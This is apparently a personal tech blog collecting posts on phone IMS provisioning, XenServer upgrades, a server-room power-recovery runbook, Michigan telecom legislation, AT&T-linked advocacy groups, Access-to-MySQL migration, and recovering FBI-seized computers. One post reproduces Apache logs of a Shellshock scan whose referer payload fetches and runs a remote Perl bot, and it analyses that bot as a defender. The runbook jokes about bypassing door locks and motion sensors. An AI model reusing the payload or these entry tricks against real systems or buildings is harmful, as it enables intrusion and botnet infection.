Mostly a knowledge dump for those searching for it, including possibly my future self.
Default config doesn't work right. VoWiFi is greyed out, and Advanced LTE voice is grayed out. How to fix?
*#*#4636#*#*
Choose "Phone Information" and under "Set Preferred Network Type" choose "LTE/UMTS auto (PRL)". LTE should provision and in the corner triple dot menu, choose "IMS Service Status" and if it now says "IMS Registration: Registered" you're good to go. If not, contact T-Mobile and tell them you have a problem with your Nexus 6p and IMS provisioning and ask them to check the knowledge base, as they need to open a ticket with their NOC to fix it. There's a known issue with the IMS hostname or something like that. It'll take a few days to fix. Try this again if it doesn't resolve itself in a few days.
I found a bug exists on some Intel ICH9 Family chipsets that causes an error:
Panic on CPU 0:
Assertion 'rmrr->base_address < rmrr->end_address' Failed at iommu.c:1848
Reboot in five seconds...
The solution to this is simple.
First: Upgrade the system with the unsupported method đ xe host-call-plugin plugin=prepare_host_upgrade.py host-uuid=e6238743-x-x-x-12c391702c0b fn=testUrl args:url=http://yourwebserverhere/xenserver65/
If it returns "true", go for the next step: xe host-call-plugin plugin=prepare_host_upgrade.py host-uuid=e6238743-x-x-x-12c391702c0b fn=main args:url=http://yourwebserverhere/xenserver65/
This will take a while and return true. These are the steps that the rolling pool plugin uses.
now edit /boot/extlinux.conf and on each "append" line and change "vga=mode-????? —" on labels "upgrade" and "xe" to add "iommu=disable" ("vga=mode-??? iommu=disable —") and reboot. It should complete the network upgrade as normal and work properly after that.
Today I saw a shellshock scan against my apache logs:
[Mon Nov 03 16:43:02 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/vpasswd.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:14 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/tigvote.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/smartsearch, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:17 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/newsdesk.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/musicqueue.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:23 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mt-static, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mmstdod.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/main.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:48 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ImageFolio, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:55 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/html2chtml.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ezshopper, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:34 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/dfire.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:19 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/book.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/bb-rep.shHTTP
[Mon Nov 03 16:46:38 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auktion.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:39 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auction, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
What this means in layman's terms is that the requester seems to think I'll execute the code in the referrer header (some CGI scripts would do this, especially with the bash vulnerability). What it wants me to do is go to that URL, download the code contained within, and execute it.
This is dangerous. I don't recommend it. It's obsfucated by using base64 encoding. I changed the exec statement to a print, and output that to a file. I zipped both and they are both here (note that you have to alter the URL to end in .xxx, download it and rename it to .zip, because google) for forensic purposes.
It looks like the bot will change its name in the process table to one of the following:
Then it will connect to the IRC server 'mboost.su' on port 443. It will join #shock and accept commands from 'M', 'st0n3d','x00' and 'jorgee'.
It accepts a myriad of commands to UDP flood hosts, portscan them, connect to arbitrary ports, reverse shell, and ctcp/msg/noticeflood anyone on the IRC server. It can also send emails from the target machine, and download any arbitrary file.
If you haven't patched your server, keep your eyes out. Exploits are definitely in the wild.
In 2006, with a strong case of senior-itis after putting in notice at my last employer, I was asked to document a number of things I did regularly or special things that may be done incorrectly that would be helpful to know. One of the documents I can share, because it pertains entirely to nonexistent servers, non existing servers, and a building prior to the full dissolution of my previous employer's detroit office.
It's among my favorites, one I actually saved a copy of because I liked the sense of humor I had about what had (more than) once been a very frustrating task for me to perform.
âWhatâs that burning smell?â
A guide on how to recover the Detroit office from a full, extended power outage.
Paul Timmins
Okay, if youâre reading this document, youâre probably pretty screwed. Hereâs a step by step guide.
Breaking into the office: (This is only necessary if the door controllers are not working right) [editor's note: they never work right]
The holdmagnetsare rated for 300 pounds of lateral force. Donât waste yourtimedinking with trying to pull them open. Youâll break the door first. You have two options:
1â4â – 1â2â steel rod, 1 meter long. (you can get this at home depot for a buck, it might be threaded, but who cares) Slip this through the crack between the door and the jamb, and use it to push the emergency exit button. It requires about 2 pounds of force, so a meterstick might not be sufficient.
MacGuyver method. Heat up a party balloon under your arm until itâs about 85-90 degrees. Stick its mass through the door, and hold it by its neck. Inflate it with a drinking straw. Release the balloon, such that it flies in the path of the motion sensor. This may take several tries.
The fire panel can override the perimeter locks. There are two ways to trigger this. One is to call property management and convince them to override your locks at the fire panel. Option two is left as an exercise to the reader.
So youâre in. Now what? Well, that server room lock is failshut. You canât operate it in a power outage, and thereâs no fire panel override. Itâs a 6 pin tumbler lock with no special warding. A locksmith (or me!) can open it in under 15 minutes with a simple set of lockpicks. Prop this door because it WILL relock.
Getting everything happy:
Ensure you have power to the entire office. Getting halfway through this to find out that you only have power to half the room is not good.
Air conditioning is critical. The room should be below 70F. If it is above 85F, do not continue until the AC has cooled the room. This can occur if the systems run off UPS for a while, because the AC is not on the UPS. If the AC isnât spitting cold air out the vent by the door, turn the thermostat âOFFâ, then to âCOLDâ, waiting 30 seconds between the toggle to avoid problems with the AC compressor. IF THE BUILDING LOSES PRESSURE TO THE CHILLERS, YOU MUST DO THIS STEP BECAUSE THE INTERLOCKS WILL SHUT OFF THE AC TO PREVENT DAMAGE, AND THE INTERLOCKS ARE RESET BY DOING THIS. BUILDING MANAGEMENT CANNOT HELP YOU WITH THIS â THE SERVER ROOM AC BELONGS TO TB.
By now, youâre enjoying the fresh air. Make sure all computers are off, and then power on the UPSen. If they fully discharged, theyâre going to have a lot of inrush current in the first 10 seconds, so you should do this step. It just might save you a blown breaker. (though I have not experienced this)
Now we start powering up equipment. Power on all Ethernet switches. They are booted when all the lights are out but power, and maybe a few ports blinking away cheerfully. In 30 minutes youâll be as happy as those little green lights are, so stay calm.
Then power on the T1 router. Itâs a Cisco 1700 series in the telecom rack. It is functional when you see W0 lit as active. If this is a regional power outage or natural disaster, check the back to make sure the alarm light isnât illuminated. If it is, the T1 line itself is down. Call MCI/Verizon Business/AT&TMCI/Bell System, American Telephone and Telegraph, and related companies, depending on the level of telecom consolidation when you read this. The circuit is through UUnet as of this writing.
Then power on the ASA. It is functional when the lights are doing their happy blinky thing.
Power on DC3 and DC4. This will establish an AD tree relationship with San Mateo/San Francisco/Bunch of people screaming for help floating in the water after the âBig Oneâ.
Watch them come up on the KVM. Have a beer.
Power on DC1DT and DC2DT, taking care not to spill your beer on the servers. DC2DT may take a waving of a dead chicken over top of it to properly boot as of this writing.
Once those come up, make sure all raid enclosures in the office are plugged in and operating. Wave dead chicken as necessary.
Power on ops-mon, FS3DT, and EX1DT.
Power on PHONESYSTEM, ensuring both power supplies have power. Green LEDs are illuminated at the back of the power supply, right? This is very heat sensitive, so if you have to delay it to get the server room below 75 F, please do.
Reset the doorlock controllers. Theyâre the big box with the ominous triangle printed on them on the wall above the keyboard for the phonesystem. Just yank their power, plug them back in, and listen in amusement as they do a little clicky dance with all the relays. The system is now reset and mostly operational.
Power on the HP desktop across from the phonesystem. This dinky ass piece of crap is the badging machine. Log into it as local administrator, password is supplied elsewhere. Make sure that stupid dos window with the numbers counting comes up (itâs in the startup group, so it should!). Donât close that. At this point, you can, in theory, rely on the door locks. Test them at the server room door.
Power on the backup machine.
Power on the rest of the computers. I just turn every computer in the room on to be safe.
As a courtesy, power on the tenantâs crap. You donât have to, but it builds goodwill and theyâre more likely to give you favors. Seriously.
Check your email. If it works, go home, or whatever.
Today a disservice was done to the citizens of the State of Michigan. This bill hampers competition and allows a greedy large corporation to take advantage of some of the most vulnerable segments of our population. Senior citizens and lower income users deserve to be protected. In this case, they are not. I hope that in future votes my colleagues will take into consideration the long term effects of legislation that we pass.â
On 3/11/2014, Senate Bill 636, as amended, was passed in the State House of Representatives of Michigan. For my post on the original bill, click here. (Please note there is an important amendment I'll be discussing below.)
Not all is lost. Numerous news reports (many of them sympathetic to AT&T's position, but it raised attention regardless), 19,000+ hits to this blog, attention from many other blogs and websites, and outcry from numerous public safety, consumers rights groups, and competitive providers managed to hold off this law for almost 3 months. In that time, something that passed the state Senate in 2 days with a final vote of 31 yeas, 4 nays, 2 excused, and 1 abstain ended up passing the state House in nearly 90 days, with 71 Yeas and 39 nays, and only after being amended.
What was the amendment, and what does it do? Are we safe?
It adds onto the section that allows a provider to withdraw as a telephone company entirely (as long as there was a workable solution for 911 emergency calling in the area), a section binding the withdrawing carrier to the FCC IP Transition order, should they choose to withdraw. (This would apply whether it's a formal FCC IP Transition trial or not, until federal regulations are passed codifying the IP transition nationwide, which would likely supersede any state laws we have on the topic anyway, so we're only losing so much here)
Regulation of interconnection, wholesale access, and consumer issues would remain the purview of the MPSC, using the FCC IP Transition trial rules until the FCC passes its own final rules for the IP transition.
Have no illusions – this isn't the best case scenario for Michigan consumers, or competitive providers. But it's much better for them than the original SB636. The FCC IP transition order provides some consumer protection (but not a lot) by requiring applicants to prepare reports on the impact of transition for many different types of things, such as credit card terminals, heart monitors, etc. And it allows wholesale access to legacy network elements, so competitive providers could decide to provide legacy TDM/POTS equivalent service if there is market demand for it (and obviously in many places, there would be).
What it doesn't do is compel the RBOC/ILEC to provide those legacy TDM/POTS equivalent services. The upside for consumers is that there are carriers who would happily take that business from the ILEC (including the carrier I work for), and theoretically anyway, we'd be able to do so using our own equipment and the ILEC's wires.
The downside is, many subsidies would not be available to provide same, and CLECs don't necessarily have the sunk cost to provide this service cheaply (some do, in some areas). This could have a disproportionate impact on low-income families and rural customers, where there are fewer customers (or mostly low income customers who are paying the bare minimum the plans would offer) to subsidize a network build to provide a replacement product.
The FCC IP trials state there has to be protection of low-income/elderly/disabled customers, but I'm not certain what that would ultimately mean. Where are the cutoffs for low-income and elderly? What kind of price increases would be okay?
Smarter people than I have summarized the IP trial orders here.
The bill, because of the amendments, has to go back to the senate, where it is expected to be passed immediately, and the governor is expected to sign it. Rumors say that the governor pushed hard for these changes, as he did not want the original bill to be passed as written – nobody wants to be the governor that took away phones from elderly people, and gave away state level oversight of the largest public utilities in their state. Well, at least no governor with common sense, anyway.
Time will tell if these changes are enough to protect everyone. I'm not sure anyone with experience in the industry can tell you at this point where things will be by 2017 on these issues. It's notable that the Michigan IP transition laws would kick in right after the current presidential administration term limits out, and a new administration will take its place roughly 20 days after the law kicks in. Part of me can't help but think that AT&T will have their claws dug deeply into the backs of the nominees of both parties.
So is this the end? Are we screwed now?
No. Though many of these issues move to various other states, and the federal level. (AT&T often uses Michigan as a model for legislation in other places – HB4314 was used to prove that if similar legislation was passed in other states, they too would benefit from increased deployment of AT&T's U-Verse product, for example, and from increased investment in their state. AT&T expanded U-Verse deployment, and located more employees in Michigan as a reward for passing HB4314)
Additionally, with Network Neutrality changes, broadband data caps, and the consolidation of major industry players any ability to offer services over the broadband connection of a third party (such as Vonage, Aereo, Skype, Youtube, Hulu, and Netflix) is severely threatened. More independent carriers would let the free market figure out network neutrality, but with consolidation and things like SB636 (at least in its original incarnation, though we don't know what this new incarnation will really bring for certain) we impact the ability for new entrants to create proper competitive pressure. (Each of those links contains more information, and on most, an opportunity to voice your opinion).
In short, what they call "Structural Separation" – this is when companies are split up between the side that maintains the outside plant infrastructure, and the company that provides voice and data services. The outside plant company would only care what customer belongs to whom as a technical necessity (ie: Where does this customer's wire, fiber optic cable, etc get hooked to in the central office? To AT&T's switch, or to another carrier?). They would own all the buildings, structures, and wires.
This company would be legally separate from any company providing data or voice services, much like AT&T long distance was broken off from the Bell system in 1984, but in this case we're taking it a step further – separating phone companies from the outside wires. AT&T would pay rent to be in the buildings under the same terms and conditions that competing carriers do, and be subject to the same outside plant conditions that the other carriers would.
Any improvements to the outside plant would be cost averaged across the combined customer base, and would affect all carriers equally. AT&T wouldn't benefit unduly from having a large embedded base (except from the usual economies of scale with billing, support, IP transport, and telephone service), and any carrier could roll out any technically possible service at any time.
The outside plant company would have an incentive to come up with better quality loops, better fiber optic penetration, better everything because carriers would demand that of them (and would work out a way to pay for it collectively, if necessary), and they would all benefit equally from the deployment. The outside plant company may even come up with better products to offer – for example, a wholesale VDSL2 DSLAM setup in the neighborhoods that any carrier could pay to use with their equipment to extend the reach. This would allow nearly any carrier to roll out a U-Verse like service overnight. Economies of scale would be spread across all market participants – Currently if 4 companies in a business park want service from 4 different carriers, each has to run their own fiber to the customer's building all the way back to a central point. A structural separated provider could run one 48 count cable to the business park, and hand all 4 carriers their own set of strands to each building. If a customer wanted to change carriers, or add a second, they'd be able to hook up unused capacity, or even swap a cable over from one carrier to another in the central office. This means the entire business park could benefit from that scale, and bringing the other buildings into the fold would be simplified, no matter what carrier they want to use.
It may sound utopian, but several countries are doing this today.
Imagine if your house had access to fiber optic services from 4-6 companies. Do you think people would still be talking about net neutrality and bandwidth caps? Heck no, because if one of those carriers sold capless products that worked well with everything, people could switch in a heartbeat to them. There's no sunk costs and no startup time. The company that tried to limit their customers unnecessarily would be out of business in a heartbeat.
TL;DR
Too much to read? Summary: AT&T managed to get their bill passed with some change due to consumer and citizen outcry. The changes are good, but not as good as not having the law at all.
While the future is uncertain, you still have influence, and there are many battles other than this one that can have similar impact on you, no matter who you buy your services through. I strongly urge you to weigh in on them with those who are in power (and many of them are actually listening, as this isn't a particularly partisan issue, and affects everyone!). I strongly urge people to pressure their legislators, and their friends, to become educated on the topics I mentioned above, and to push people to have positions on them, much like people do about things like abortion, gun control, social security, and other stuff. Almost everyone in the US uses a telephone or the internet daily, and what happens to these services matters a lot.
And if you haven't seen what the other side is capable of, I strongly suggest checking out my earlier post about AT&T's involvement with Astroturf groups here. Other sites discuss this in greater detail.
And to steal a line from Dr Seuss: âUnless someone like you cares a whole awful lot, Nothing is going to get better. It's not.â
A recent article in Fierce Telecom titled "Special access, end of PSTN no secret to wireline marketplace" , written by Bruce Mehlman was a response to an article written by Bruce Kushnick, who is no friend of the incumbent telephone companies, for sure.
The tone of the article would imply that they're an advocacy group for broadband by any means necessary – they want speed and don't care under what terms and conditions it's available, as long as it's "cheap". Â Seems fair and innocent enough, from the "cheap, fast, good, pick two" – they chose cheap and fast. I disagree with this strategy, but more power to them.
But wait – what they're advocating is exactly what AT&T is trying to carry out with SB636 in Michigan. I can't help but think that's a bit odd, so I dig a bit to see what the story is with this "Internet Innovation Alliance" that I've never heard of before. What I found was interesting.
AT&T Supplier – Ironically provides premier test equipment for that "obsolete network" that they're trying to get rid of. Their techs carry this tool a lot.
Communications Technology Solutions / CBM of America
AHGA and AHF Privacy Policy- AHGA and AHF will not disclose any information whatsoever about their members,
customers, or supporters to any other parties under any circumstances. – Advocate of AT&T policies in the past.
Hispanic Telecommunications and Technology Partnership
Indeterminate, likely a front group
Promotes many AT&T initiatives, ties to the NTCA and USTA. All positions seem to be related to AT&T initiatives.
Hispanic Leadership Fund
Indeterminate, likely ideological
Unknown, no public webpage, no known policy statements.
Independent Technologies Inc
Supplier
Supplier, ironically, of equipment for AT&T's "Obsolete" POTS/TDM network.
Independent Women's Forum
Donor/Ideological
AT&T is a donor to the IWF.  Generally supports elimination of government regulations.
Minerva sells IPTV middleware that controls IPTV set top boxes. AT&T uses Microsoft MediaRoom, but given that Microsoft has no interest in continuing that line, I suspect AT&T is working with Minerva at this point to replace MediaRoom.
Supplier of various telecommunications cabling and connectors. (Many punchdown blocks are made by Suttle)
Telesync
Supplier
Ironically, most of their products are for those old, evil POTS services they're trying to get rid of.
TechAmerica
Consortium
AT&T is a member
USIIA
Consortium
AT&T is involved with this group. Verizon has an employee on the board of directors. They have a history of speaking in favor of all AT&T initiatives, all the way back to the bell south merger.
Women Impacting Public Policy
AT&T employees part of advisory board / Ideological
Now, to be clear, I don't think that taking a single dollar of AT&T's money taints you. But when you're part of a public policy group that is unrelated to your mission (What does this have to do with Indian agriculture, or cattlemen?), and you take money from AT&T, your opinion may be not as independent as you make it sound.
The thing with nonprofits is, they don't have an inherent means of self support. They rely on donors. If you get a big donor that seems awesome at first, it opens a lot of doors for you. When they ask for your support, and it doesn't seem completely unreasonable (just sign your name to this, it's going to pass anyway and we could really use your help, as we've helped you in the past) – few organizations can afford to say no, especially if it doesn't harm their constituency directly or go against their stated goals. It puts them in the unenviable position of either giving a large donor a hand over something inconsequential to their members/beneficiaries/whatever, or taking an unnecessary stand to say "This is tangential to our mission" and risk a pay cut.
I needed to do this, and found the existing documentation somewhat lacking. My work will be on a file in the original MDB access format (not the newer XML based ones). I'm working on Debian Linux. Instructions for derivatives (such as Ubuntu) should be identical. Other distributions (Redhat Based) may use different package names (using the yum package manager should simplify this, but I have not tested these instructions under Redhat/CentOS/etc).
For the purposes of my example, I'll call my MySQL database "taco" and my Access file "nacho.mdb".
Where I say "(creds)" you place any connection information you may usually need – an example would be "-h database.yourdomain.com -u youruser -pyourpassword"
First, install the mdbtools package:
apt-get install mdbtools
Answer the questions as appropriate.
Create a new database to hold these files:
optional, but suggested. You can always move tables around later.
mysqladmin (creds) create taco
Build empty tables to house all your data, using the Access schema:
This creates empty tables with the same names, structures, and datatypes (or their equivalents) as the access database.
mdb-schema nachos.mdb mysql | mysql (creds) taco
Copy all the data over:
I asked for a tables list, comma delimited. Then I removed the trailing comma, then told xargs to run mdb-export for each table name in the file. BLAH is used as a placeholder, and is replaced by whatever table name it's working on. Please note the positions of commas and spaces are crucial to the proper operation of this command.
I know, we're all perfect, right? But let's pretend …your friend… makes a mistake, or encounters a correctable error in processing. The easiest thing to do is dump the mysql database and start all over (you did create a new database just for this, right?)
mysqladmin (creds) drop taco
Answer "Y" and push forward. Only by losing everything are we free to do anything. That's what you'll tell yourself to feel better about the time wasted by starting over. Unless you know what you're doing, I promise you this is the easiest, quickest way.
So I wanted to write a piece for Autistics Speaking Day. I wrote this blog post that was well over 2100 words, and spoke to the idea of making sure that if a child is different, don't be their first bully. It went far deeper into things than I really feel comfortable talking about in public (not so much about my parents, who despite their faults are/were generally okay, but more about the absolutely hellish experience I had in elementary school – kindergarden through 6th grade. It spoke about involuntary restraint, seclusion, bullying (just about as much by the adults and the system as the kids), acting out violently, and wandering.)
I decided instead to publish this. I drew a helpful map of my old elementary school for non-typical children like I was, so they can easily navigate their days like I was able to. It's not really comprehensive, but it's a start.
(Needless to say, I know exactly what to be hyper vigilant for as my child goes through school. And I know that my child's school nowadays has acceptable procedures for handling many of the issues I dealt with as a kid.)
For the past nearly 10 years, I've been patiently waiting for a single event to happen. In November 2003, a ton of my personal belongings walked out the door of my apartment. I was told to forget about them forever. That the government would find a way to keep them, destroy them, or auction them.
I made it my personal goal to get that equipment back. I didn't have a lot of resources to fight that battle, and I still don't. Lawyers cost tons of money, far more than the equipment could ever be worth. But what walked out that day wasn't just a pile of equipment. It was 100% of my personal data I had ever collected, EVER, in the time I had computers. In that collection is floppy disks, hard drives, zip disks, DAT tapes, basically everything I had ever done from the time I first laid hands on a keyboard (or video camera, as they took all my VHS-C and SVHS tapes with raw footage on them too). I never really shot analog, so every photo I had ever taken, from my Polaroid PDC 640 onward, gone. I think I even have webcam shots, and pictures from our school's Sony Mavica in this pile of computers. Tons of scanned photos that were taken by others, from my first flatbed scanner.
Logs from some of the first BBSes I ever connected to. Some of the first programs I ever wrote.
And what they told me on that November day, is that all of this was gone forever. Even the stuff I wrote the week before. Back then we didn't have a cloud like you kids have nowadays. We had a garden hose and a sprinkler, and we got our rainbows that way, and we liked it… But seriously. If you woke up and someone said "all your stuff is stolen. We know where it is, but you'll never see it again. You need to let go and start over…."
Sure, you're thinking – why didn't you back it up? I did. On all the media that went out the door with it. DVD-RW, gone. DAT backups? gone. If it plugged into the wall, or stored a magnetic charge, it was fair game. They took my dreamcast games, for crying out loud.
But obviously it triggered something. I filed the request in July of 2012, and the response was (after a month of research time), well… literally stating that my FBI file was larger than the Bible. I got several CDROMs, which had interesting information (including the fact that they unsuccessfully continued to attempt to indict me for other crimes (I also did not commit) until 2009with a standing grand jury. Yes, they had continued to fight to prosecute me for over 6 years afterward.). But nothing at all about the seizure except some notes they took during the raid.
I got my last CD from them in late December of 2012. In February 2013, I get a very upset call from Becky. "An FBI agent just left me a voicemail, he's looking for *YOU AND ME!* He didn't say why.". Obviously I immediately backed up a copy of everything I had offsite, then grabbed my phone and called the agent back, expecting the worst. … "I have some items we're looking to return to you. I need you to fill out some forms."
I don't have to tell you at this point my jaw just about hit the floor.
He went on to tell me about all these computers they found in a warehouse. Ones that belonged to me, from a case in 2003. I told him where to send the paperwork.
I get the letters a bit later, and my heart sank. They were authorization to return my computers, CONDITIONAL ON MY CONSENT TO WIPE THE DRIVES.
Because what I really want is the kind of computer I could afford in 2003, with no data on it. Yeahhhhhh.
It had a 30 day deadline. I redlined the sections providing consent to wipe the drives, initialed them and signed them, and sent them to the agent.
He calls and explains policy, and procedure. Tells me how lucky I am since "they don't have to return anything, according to my plea bargain"
I start to grin. Here's the turning point in that conversation.
Me: "Actually, according to my plea bargain, there's only one computer you don't have to return. The rest, I'm constitutionally entitled to due process to receive."
Agent: "Plea bargains always contain a forfeiture clause. It states we can dispose of the seized items however we like. We just like to give the opportunity to return them."
Me: "Mine, you'll find, is worded differently. The change is subtle, but important. Can you pull mine up, and read the first sentence of the forfeiture clause to me?"
Agent: "'The defendant forfeits and otherwise waives any ownership right in all items involved in the acts alleged in the Bill of Information or Bill of Indictment.' Now see, I told you…"
Me: "Read Adam's Forfeiture clause. His is the boilerplate one. He had much bigger fish to fry than I did."
Agent: "*murmering to himself as he read it, tried to compare it*. 'I don't see the difference here.'."
Me: "I'll fax over a copy for your review, so you can see the difference. This was specifically negotiated, and I should be able to enforce it in court."
Agent: "I'm just trying to do my job, and close this case out."
Me: "I understand that, but I had a deal with the US government, and they can't try to get out of their obligations under the agreement just because they're inconvenient 10 years later. This is a written and enforceable contract, and this was an inseparable part of the deal. I can't go and un-serve probation, and the government can't change their mind after the fact"
Agent: "If you can fax me the highlighted sections, I'll run this by my boss."
Me: "No problem, I'm hitting send on the fax right now. Talk to you soon!"
My lawyer thought I was crazy for worrying about this, but I demanded a 2 word change in the plea bargain. The prosecutor was anxious to close the deal, and figured it was a very minor change, he assured me it 'only changed the wording, as I'd get back anything not used in the crime anyway'. I knew otherwise.
Suddenly, the change is clear, isn't it? The court only had the right to dispose of one computer – the laptop used to connect to the Lowe's network to check my email.
Small problem for them –Â They never bothered doing forensics on any of my data.
The FBI agent calls back a few days later, says this is all well and good, but there's over 40 hard drives and do I really expect them to do forensics on the drives to determine what was used in the crime and what wasn't? ABSOLUTELY. I offered to tell them the serial number of the laptop used to connect to the wifi, to let them wipe that, but they stated they couldn't just take my word for it.
Then, I said, they'd better dust off their copies of encase, and get to work. Because "it'd look stupid if you had to tell a judge you didn't want to honor my civil rights because it's really hard, and time consuming, but not important enough to do over the past 10 years we've had the data"
I didn't hear from them for a few months. I figured they were mulling their options.
…3 months later…
A very upset call from Fedex to my cell phone. Apparently I missed a dropoff. And the items were very, very large. And they were not pleased about that.
"Where are the items shipping from?"
"US Department of Justice, Western District of North Carolina…. Sounds like these are important, huh?"
"That's an understatement. My wife was at an appointment, she'll be home all day tomorrow. Can you reattempt delivery then?"
"Sure. Thanks for choosing FedEx!"
I got a call from Becky the next day. Apparently, the packages were too large for the FedEx delivery driver to carry himself. Becky had to help unload and carry them. Inside, were hundreds of pounds of equipment, paperwork, videotapes, CDs, … everything. Untouched.
Over the last month, I've been firing up machines one by one, and finding to my amazement that after a decade in storage, 100% of the data was intact and recoverable. I haven't gotten to the floppy disks yet, but my Kryoflux controller should make short work of that. Then my professional grade editing SVHS deck should make viewing the videotapes a snap.
I leave you with a celebratory posting of the oldest photo I can find of myself – this is from October of 2000, on my last day at Isiah.com before they went out of business. I looked like a dweeb back then.
The personal website of Paul Timmins – Telecommunications expert, father.